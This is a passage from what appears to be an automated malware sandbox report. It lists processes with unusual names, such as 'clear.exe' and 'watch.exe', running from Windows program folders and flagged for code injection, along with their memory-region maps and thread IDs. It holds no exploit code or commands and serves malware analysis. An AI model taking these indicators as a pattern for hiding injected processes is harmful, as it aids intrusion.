"BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3131 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3132 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3133 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3134 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3135 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3136 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3137 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3138 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3139 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3140 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3141 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3142 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3143 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3144 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3145 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 3146 start_va = 0x650000 end_va = 0x70bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 3147 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 3148 start_va = 0x840000 end_va = 0x9c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 3149 start_va = 0x9d0000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 3150 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 3151 start_va = 0x12e0000 end_va = 0x12f6fff monitored = 0 entry_point = 0x12e14a1 region_type = mapped_file name = "raiseleftbuy.exe" filename = "\\Program Files (x86)\\WindowsPowerShell\\raiseleftbuy.exe" (normalized: "c:\\program files (x86)\\windowspowershell\\raiseleftbuy.exe") Region: id = 3152 start_va = 0x1300000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001300000" filename = "" Region: id = 3153 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3154 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3155 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3156 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3157 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3158 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3159 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3160 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3161 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3162 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3163 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3164 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3165 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3166 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3167 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3168 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3169 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3170 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3171 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3172 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3173 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3174 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3175 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3176 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3177 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3178 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 161 os_tid = 0x1034 Thread: id = 162 os_tid = 0x102c Process: id = "20" image_name = "clear.exe" filename = "c:\\program files (x86)\\windows photo viewer\\clear.exe" page_root = "0x12495000" os_pid = "0x1040" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\clear.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Photo Viewer\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3227 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3228 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3229 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3230 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3231 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3232 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3233 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3234 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3235 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3236 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3237 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3238 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3239 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3240 start_va = 0x520000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 3241 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 3242 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 3243 start_va = 0x7d0000 end_va = 0x957fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 3244 start_va = 0xa10000 end_va = 0xa26fff monitored = 0 entry_point = 0xa114a1 region_type = mapped_file name = "clear.exe" filename = "\\Program Files (x86)\\Windows Photo Viewer\\clear.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\clear.exe") Region: id = 3245 start_va = 0xa30000 end_va = 0xbb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 3246 start_va = 0xbc0000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 3247 start_va = 0x1fc0000 end_va = 0x207bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fc0000" filename = "" Region: id = 3248 start_va = 0x20e0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 3249 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3250 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3251 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3252 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3253 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3254 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3255 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3256 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3257 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3258 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3259 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3260 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3261 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3262 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3263 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3264 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3265 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3266 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3267 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3268 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3269 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3270 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3271 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3272 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3273 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3274 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 163 os_tid = 0x104c Thread: id = 164 os_tid = 0x1044 Process: id = "21" image_name = "watch.exe" filename = "c:\\program files\\windows sidebar\\watch.exe" page_root = "0x445000" os_pid = "0x1014" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "11" os_parent_pid = "0x640" cmd_line = "\"C:\\Program Files\\Windows Sidebar\\watch.exe\" " cur_dir = "C:\\Program Files\\Windows Sidebar\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3083 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3084 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3085 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3086 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3087 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3088 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3089 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3090 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3091 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3092 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3093 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3094 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3095 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 3096 start_va = 0x4b0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 3097 start_va = 0x5b0000 end_va = 0x66dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3098 start_va = 0x770000 end_va = 0x8f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 3099 start_va = 0x900000 end_va = 0xa80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 3100 start_va = 0xae0000 end_va = 0xaeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 3101 start_va = 0xb50000 end_va = 0xb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 3102 start_va = 0xb60000 end_va = 0xc1bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 3103 start_va = 0x1200000 end_va = 0x1216fff monitored = 0 entry_point = 0x12014a1 region_type = mapped_file name = "watch.exe" filename = "\\Program Files\\Windows Sidebar\\watch.exe" (normalized: "c:\\program files\\windows sidebar\\watch.exe") Region: id = 3104 start_va = 0x1220000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 3105 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3106 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3107 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3108 start_va = 0x6f190000 end_va = 0x6f1acfff monitored = 0 entry_point = 0x6f193b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3109 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3110 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3111 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3112 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3113 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3114 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3115 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3116 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3117 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3118 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3119 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3120 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3121 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: 